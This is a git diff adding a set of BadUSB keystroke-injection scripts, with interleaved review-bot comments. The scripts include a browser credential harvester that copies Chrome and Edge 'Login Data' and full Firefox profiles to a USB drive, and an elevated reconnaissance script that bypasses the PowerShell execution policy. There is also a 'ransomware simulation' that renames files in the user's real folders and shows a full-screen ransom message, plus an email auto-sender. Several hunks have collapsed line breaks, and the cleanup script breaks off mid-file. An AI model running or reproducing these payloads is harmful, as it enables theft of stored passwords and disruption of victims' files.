diff --git a/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt b/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt
new file mode 100644
index 00000000..0a33b3bd
--- /dev/null
+++ b/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt
@@ -0,0 +1,42 @@
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%
+REM %%%%%%%%%%%% This script is intended to send an email via badUSB (into your logged in gmail on chrome) %%%%%%%%%%%%
+REM %%%%%%%%%%%% This script will open chrome, send an email, and then close chrome. Must be logged in to email %%%%%%%%%%%%
+REM %%%%%%%%%%%% You can use python to replicate this script by changing email addresses & name every time %%%%%%%%%%%%
+REM %%%%%%%%%%%% The python script in section 2.1 generates badusb scripts for multiple emails if need be %%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+DELAY 1000
+GUI r
+DELAY 500
+STRING chrome
+ENTER
+DELAY 1000
+STRING https://mail.google.com/mail/u/0/#inbox?compose=new
+ENTER
+DELAY 5000
+DELAY 1000
+STRING {EMAIL ADDRESS YOU WANT TO SEND EMAIL TO}
+DELAY 500
+TAB
+TAB
+STRING {YOUR SUBJECT NAME}
+TAB
+STRING Hi {THEIR NAME}
+ENTER
+ENTER
+STRING {CONTENTS OF THE EMAIL}
+ENTER
+ENTER
+STRING {IF YOU WANT A SECOND PARAGRAPH, THIS IS WHAT DOUBLE-ENTER ABOVE DOES}
+ENTER
+ENTER
+STRING Respectfully,
+ENTER
+ENTER
+STRING {YOUR NAME}
+ENTER
+CTRL ENTER
+DELAY 5000
+DELAY 1000
+ALT F4
+REM check out github.com/markcyber for more scripts
diff --git a/BadUSB/BadUSB-MarkCyber/Emails/GenerateEmailScripts.py b/BadUSB/BadUSB-MarkCyber/Emails/GenerateEmailScripts.py
new file mode 100644
index 00000000..16662391
--- /dev/null
+++ b/BadUSB/BadUSB-MarkCyber/Emails/GenerateEmailScripts.py
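Review bot: The sixth REM line of the EmailSender.txt header points to "the python script in section 2.1", but nothing in this commit is numbered that way; the companion added next to it is `Emails/GenerateEmailScripts.py`. The comment should name that file, e.g. `REM The companion GenerateEmailScripts.py generates badusb scripts for multiple emails if need be`. The send chord is also spelled `CTRL ENTER` here and `CONTROL ENTER` in the generator's template, so one spelling should be chosen to keep the hand-written and generated files comparable.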
@@ -0,0 +1,101 @@ +####################################################################################################################################### +####################################################################################################################################### +################# This script was created by github.com/MarkCyber (w/ assistance of ai) #################### +################# This is a python script to automatically create BadUSB scripts to auto send emails #################### +################# This takes a excel sheet with the columns named "Names" and "Emails" #################### +################# This script will then make a badusb script using the name + email of each person #################### +################# There are various subject options that will be chosen from, to minimize "spam" #################### +################# Change the signature to your name, and put subject options that fit your email #################### +################# Lastly, of course make sure to change the contents of the email to what you want #################### +####################################################################################################################################### +####################################################################################################################################### + +import pandas as pd +import random + +# Load the Excel file, make sure it has the same name (or change the name in this script) +file_path = 'NameAndEmails.xlsx' +data_df = pd.read_excel(file_path) + +# Your excel should have 2 columns. Names, and Emails. +data_cleaned_df = data_df[['Names', 'Emails']].dropna().reset_index(drop=True) +data_cleaned_df.columns = ['Name', 'Email'] + +# List of placeholder subject options. Change these to 7 similar subjects that match your email (if you are sending many. 
You can use the same if not) +subject_options = [ + "Placeholder for subject option 1", + "Placeholder for subject option 2", + "Placeholder for subject option 3", + "Placeholder for subject option 4", + "Placeholder for subject option 5", + "Placeholder for subject option 6", + "Placeholder for subject option 7" +] + +# Placeholder for email body template. The name field will be filled from the "names" section in the excel sheet you provided. +# Just modify the actual email body and sender name to fit your needs +email_body_template = """ +Hi {name}, + +Placeholder for email body. + +Warm Regards, +Sender Name +""" + +# Function to generate BadUSB script +def generate_badusb_script_with_placeholders_single_file(data_df): + script_template = [ + "DELAY 1000", + "GUI r", + "DELAY 500", + "STRING chrome", + "ENTER", + "DELAY 1000", + "STRING https://mail.google.com/mail/u/0/#inbox?compose=new", # In chrome it opens gmail to compose an email. This is why you must be logged in. + "ENTER", + "DELAY 5000" + ] + + scripts = script_template + + for index, row in data_df.iterrows(): + name = row['Name'] + email = row['Email'] + subject = random.choice(subject_options) + random_delay = random.randint(10000, 25000) + + email_body_lines = email_body_template.format(name=name).strip().split('\n') + email_body_lines = [f"STRING {line.strip()}" for line in email_body_lines if line.strip()] + + email_script = [ + "DELAY 1000", + f"STRING {email}", + "DELAY 500", + "TAB", + "TAB", + f"STRING {subject}", + "TAB" + ] + email_body_lines + [ + "ENTER", + "CONTROL ENTER", + "DELAY 5000", + f"DELAY {random_delay}", #random delay so emails are not sent at the sames, ideally minimizing the potential to be marked as spam + "ALT F4" + ] + + scripts += email_script + + return "\n".join(scripts) + +# Generate the BadUSB script with placeholders and proper send command in a single file +final_script_with_placeholders = generate_badusb_script_with_placeholders_single_file(data_cleaned_df) + +# 
Save the script to a file +final_script_file_path = 'final_script_with_placeholders.txt' #This would be your badusb script +with open(final_script_file_path, 'w') as file: + file.write(final_script_with_placeholders) + +print(f"Script saved to {final_script_file_path}") + +#check out github.com/markcyber for more badusb / pen testing / automation tools and scripts diff --git a/BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt b/BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt new file mode 100644 index 00000000..d7a27cea --- /dev/null +++ b/BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt 
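Review bot: The `Emails` cell is written into the output as `f"STRING {email}"` with no validation, so a spreadsheet value containing a line break places an extra, attacker-chosen line into the generated keystroke file, which the device would then type as its own command. The workbook should be treated as untrusted input: at the top of the loop in `generate_badusb_script_with_placeholders_single_file`, skip or reject such rows, e.g. `if '\n' in str(email) or '\r' in str(email): continue`. The body path is less exposed because `email_body_template.format(name=name)` is split on newlines and every piece is re-prefixed with `STRING`. Separately, `scripts = script_template` aliases the list, so `scripts += email_script` also mutates `script_template`; `scripts = list(script_template)` avoids that.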
@@ -0,0 +1,54 @@
+REM ##################################################################################################################
+REM ############## This script was created by github.com/markcyber ##############
+REM ############## This script requires a secondary USB named "MYUSB" to save credentials to ##############
+REM ############## The extracted data will require decryption ##############
+REM ##################################################################################################################
+REM Open PowerShell
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell
+DELAY 500
+ENTER
+DELAY 1000
+REM Check if the USB drive exists
+STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter;
+STRING if ($usbDrive -ne $null) {
+ENTER
+DELAY 500
+STRING cd $usbDrive;
+ENTER
+DELAY 500
+STRING mkdir BrowserData;
+ENTER
+DELAY 500
+STRING cd BrowserData;
+ENTER
+DELAY 500
+REM Copy Chrome Login Data to USB
+STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data";
+STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; }
+ENTER
+DELAY 500
+REM Copy Firefox Login Data to USB
+STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\";
+STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; }
+ENTER
+DELAY 500
+REM Copy Edge Login Data to USB
+STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data";
+STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; }
+ENTER
+DELAY 500
+STRING }
+ENTER
+DELAY 500
+REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC)
+STRING echo off | clip
+ENTER
+DELAY 500
+REM Close PowerShell
+STRING exit
+ENTER
+DELAY 500
+REM Check out Github.com/MarkCyber for more badusb scripts and other hacky stuff
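Review bot: The comment `REM Copy Firefox Login Data to USB` understates the line under it: `Copy-Item $firefoxPath -Recurse` copies the whole `Profiles` directory, not a single login store, so the drive ends up holding every file of every Firefox profile on the account. The comment should say what is actually taken, e.g. `REM Copy the entire Firefox Profiles directory (all profile data, not only saved logins) to USB`, and the header should list the three source paths so that whoever handles the drive on an engagement knows its contents. For defenders, the observable in this hunk is a PowerShell process, rather than the browser itself, reading the `Login Data` and `Profiles` paths and writing to a volume labelled `MYUSB`.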
diff --git a/BadUSB/BadUSB-MarkCyber/HackStuff/VulnerabilityScanner.txt b/BadUSB/BadUSB-MarkCyber/HackStuff/VulnerabilityScanner.txt new file mode 100644 index 00000000..51e1b0d0 --- /dev/null +++ b/BadUSB/BadUSB-MarkCyber/HackStuff/VulnerabilityScanner.txt 
@@ -0,0 +1,630 @@ +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This script acts as a plug-in vulnerability scanner. Only use with permission %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This will require a secondary USB named as "MYUSB" to save all information onto %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This will find information on the following and save results in a results.txt file %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% Info on: password policy, audit services, network settings, softwares and versions, CVEs %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% Info on: open ports, firewall status, antivirus status, smbv1 status, missing updates & more %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +DELAY 1000 +REM Open Start Menu +CONTROL ESCAPE +DELAY 2000 +STRING powershell +REM Navigate to the context menu to run PowerShell as an administrator +DELAY 500 +RIGHTARROW +DELAY 100 +DOWNARROW +DELAY 100 +ENTER +DELAY 3000 +ALT Y +DELAY 5000 +REM Set PowerShell Execution Policy to Bypass +DELAY 1000 +STRING set-executionpolicy bypass -scope process -force +DELAY 200 +ENTER +DELAY 200 +REM Create the PowerShell script in memory and execute it +DELAY 200 +STRING $usbName = "MYUSB" +DELAY 200 +ENTER +DELAY 200 +STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter +DELAY 200 +ENTER +DELAY 200 +STRING if ($usbDrive) { +DELAY 200 +ENTER +DELAY 200 +STRING $owner = (Get-WmiObject 
Win32_ComputerSystem).UserName +DELAY 200 +ENTER +DELAY 200 +STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner +DELAY 200 +ENTER +DELAY 200 +STRING New-Item -ItemType Directory -Path $directoryPath +DELAY 200 +ENTER +DELAY 200 +STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt" +DELAY 200 +ENTER +DELAY 200 +STRING "" > $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING function check-passwordpolicy { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING net accounts +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking password policy: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function audit-services { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-service | select-object name, displayname, status, starttype +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error auditing services: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-networksettings { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-netipconfiguration +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking network settings: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-softwarevulnerabilities { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking software 
vulnerabilities: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-cve { +DELAY 200 +ENTER +DELAY 200 +STRING param ( +DELAY 200 +ENTER +DELAY 200 +STRING [string]$productname, +DELAY 200 +ENTER +DELAY 200 +STRING [string]$version +DELAY 200 +ENTER +DELAY 200 +STRING ) +DELAY 200 +ENTER +DELAY 200 +STRING $initialDelay = 2 +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version" +DELAY 200 +ENTER +DELAY 200 +STRING start-sleep -seconds $initialDelay +DELAY 200 +ENTER +DELAY 200 +STRING $response = invoke-restmethod -uri $uri -method get +DELAY 200 +ENTER +DELAY 200 +STRING if ($response.totalresults -gt 0) { +DELAY 200 +ENTER +DELAY 200 +STRING foreach ($cve in $response.result.cve_items) { +DELAY 200 +ENTER +DELAY 200 +STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } else { +DELAY 200 +ENTER +DELAY 200 +STRING "no cves found for $productname $version" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking CVEs: $_" +DELAY 200 +ENTER +DELAY 200 +STRING if ($_.Exception -match '403') { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..." 
+DELAY 200 +ENTER +DELAY 200 +STRING start-sleep -seconds 60 +DELAY 200 +ENTER +DELAY 200 +STRING $retryResponse = invoke-restmethod -uri $uri -method get +DELAY 200 +ENTER +DELAY 200 +STRING if ($retryResponse.totalresults -gt 0) { +DELAY 200 +ENTER +DELAY 200 +STRING foreach ($cve in $retryResponse.result.cve_items) { +DELAY 200 +ENTER +DELAY 200 +STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } else { +DELAY 200 +ENTER +DELAY 200 +STRING "no cves found for $productname $version" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function analyze-logs { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-eventlog -logname system -newest 100 +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error analyzing logs: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-openports { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING netstat -an +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking open ports: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-missingupdates { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Checking Windows Update logs..." 
+DELAY 200 +ENTER +DELAY 200 +STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log" +DELAY 200 +ENTER +DELAY 200 +STRING Get-WindowsUpdateLog -LogPath $updateLogPath +DELAY 200 +ENTER +DELAY 200 +STRING write-output "WindowsUpdate.log written to $updateLogPath" +DELAY 200 +ENTER +DELAY 200 +STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error getting Windows Update log: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-firewallstatus { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING netsh advfirewall show allprofiles +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking firewall status: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-smbv1status { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-windowsoptionalfeature -online -featurename smb1protocol +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking SMBv1 status: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-antivirusstatus { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-mpcomputerstatus +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking antivirus status: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING check-passwordpolicy >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING audit-services >> $resultsFilePath +DELAY 200 
+ENTER +DELAY 200 +STRING check-networksettings >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-softwarevulnerabilities >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING analyze-logs >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-openports >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-missingupdates >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-firewallstatus >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-smbv1status >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-antivirusstatus >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +REM Dynamically identify critical software from running processes and scheduled tasks +STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique +DELAY 200 +ENTER +DELAY 200 +STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique +DELAY 200 +ENTER +DELAY 200 +REM Combine running software and scheduled tasks +STRING $softwareList = @() +DELAY 200 +ENTER +DELAY 200 +STRING foreach ($process in $runningSoftware) { +DELAY 200 +ENTER +DELAY 200 +STRING $softwareList += $process.Name +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING foreach ($task in $scheduledTasks) { +DELAY 200 +ENTER +DELAY 200 +STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun) +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +REM Remove duplicates and empty entries +STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" } +DELAY 200 +ENTER +DELAY 200 +REM Check CVEs for identified software +STRING foreach ($software in $softwareList) { +DELAY 200 +ENTER +DELAY 200 +STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion +DELAY 200 +ENTER +DELAY 
200 +STRING if ($version) { +DELAY 200 +ENTER +DELAY 200 +STRING check-cve -productname $software -version $version >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10) +DELAY 200 +ENTER +DELAY 200 +STRING start-sleep -seconds $initialDelay +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Results saved to USB drive." +DELAY 200 +ENTER +DELAY 200 +STRING } else { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error: USB drive MYUSB not found." +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING invoke-command -scriptblock $script +DELAY 200 +ENTER +DELAY 20000 +REM check out github.com/markcyber for more badusb/pen testing scripts and tools diff --git a/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation1.txt b/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation1.txt new file mode 100644 index 00000000..b35bd533 --- /dev/null +++ b/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation1.txt 
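Review bot: The last typed command, `invoke-command -scriptblock $script`, uses a `$script` variable that nothing in this file assigns, so it can only fail; every function and call above it has already been typed and run line by line in the interactive console. The REM `Create the PowerShell script in memory and execute it` describes a design the file does not implement and should be reworded or dropped together with that command. The header also leaves out what an operator and the system owner need to know before a run: the sequence accepts the elevation prompt (`ALT Y`) and sets `set-executionpolicy bypass -scope process -force`, `check-cve` sends product names and versions to `services.nvd.nist.gov`, and `results.txt` and `WindowsUpdate.log` are left unencrypted on the removable drive. I would add a header line stating this, e.g. `REM Runs elevated; queries services.nvd.nist.gov with product names; writes results unencrypted to MYUSB`.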
@@ -0,0 +1,91 @@ +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This script simulates a ransomware attack by changing file extensions and displays a message %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% Renaming file extensions renders each file unusable until the proper extension is added %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% Run (1.1)RansomwareSimulationCleanup to revert the changes and renaming of extensions %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +DELAY 1000 +GUI r +DELAY 1000 +REM opens powershell (this is for windows machines) +STRING powershell +ENTER +DELAY 3000 +REM Define the locations using correct SpecialFolder enumerations +STRING $folders = @( +DELAY 500 +ENTER +DELAY 500 +STRING [System.Environment+SpecialFolder]::Desktop, +DELAY 500 +ENTER +DELAY 500 +STRING [System.Environment+SpecialFolder]::MyPictures, +DELAY 500 +ENTER +DELAY 500 +STRING [System.Environment+SpecialFolder]::MyMusic, +DELAY 500 +ENTER +DELAY 500 +STRING [System.Environment+SpecialFolder]::Downloads +DELAY 500 +ENTER +DELAY 500 +STRING ) +DELAY 500 +ENTER +DELAY 500 +REM Iterate over each location +STRING foreach ($folder in $folders) { +DELAY 500 +ENTER +DELAY 500 +STRING $path = [Environment]::GetFolderPath($folder) +DELAY 500 +ENTER +DELAY 500 +REM Get all files in the path and rename them +STRING Get-ChildItem -Path $path -File | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name + '.locked') } +DELAY 500 +ENTER +DELAY 500 
+STRING } +DELAY 500 +ENTER +DELAY 2000 +REM Display ransomware message +STRING Add-Type -AssemblyName PresentationFramework +DELAY 500 +ENTER +DELAY 500 +STRING $Window = New-Object System.Windows.Window +DELAY 500 +ENTER +DELAY 500 +STRING $Window.WindowStartupLocation = 'CenterScreen' +DELAY 500 +ENTER +DELAY 500 +STRING $Window.WindowState = 'Maximized' +DELAY 500 +ENTER +DELAY 500 +STRING $Window.Topmost = $true +DELAY 500 +ENTER +DELAY 500 +STRING $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.' +DELAY 500 +ENTER +DELAY 500 +STRING $Window.ShowDialog() +DELAY 500 +ENTER +DELAY 2000 +STRING exit +DELAY 500 +ENTER +REM check out my github at github.com/markcyber for more badusb & hacking type tools diff --git a/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation2-cleanup.txt b/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation2-cleanup.txt new file mode 100644 index 00000000..3be26299 --- /dev/null +++ b/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation2-cleanup.txt 
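Review bot: The rename line appends `.locked` to every file it finds, including files that already end in `.locked`, so a second run or a pre-existing `.locked` file produces names that cannot be told apart from the simulation's own, and nothing records which files were touched. Filter before renaming, `Get-ChildItem -Path $path -File | Where-Object { -not $_.Name.EndsWith('.locked') }`, and append each renamed path to a log file so that restoration can be checked against it. The same gap affects RansomwareSimulation2-cleanup.txt, which strips the suffix from any `.locked` file in these folders whether or not this script created it. The header should also state that the script acts on the logged-in user's real Desktop, Pictures, Music and Downloads folders, not on a test directory.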
@@ -0,0 +1,62 @@ +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This is a follow-up script to the RansomwareSimulation %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% Running this renames all extensions back to their original, full path- making them usable %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This can be ran multiple times if necessary %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +DELAY 1000 +GUI r +DELAY 2000 +STRING powershell +ENTER +REM increased delays to make sure each command can go through even on slower computers +DELAY 6000 +REM Define the locations using correct SpecialFolder enumerations +STRING $folders = @( +DELAY 1000 +ENTER +DELAY 1000 +STRING [System.Environment+SpecialFolder]::Desktop, +DELAY 1000 +ENTER +DELAY 2000 +STRING [System.Environment+SpecialFolder]::MyPictures, +DELAY 1000 +ENTER +DELAY 2000 +STRING [System.Environment+SpecialFolder]::MyMusic, +DELAY 1000 +ENTER +DELAY 2000 +STRING [System.Environment+SpecialFolder]::Downloads +DELAY 1000 +ENTER +DELAY 2000 +STRING ) +DELAY 1000 +ENTER +DELAY 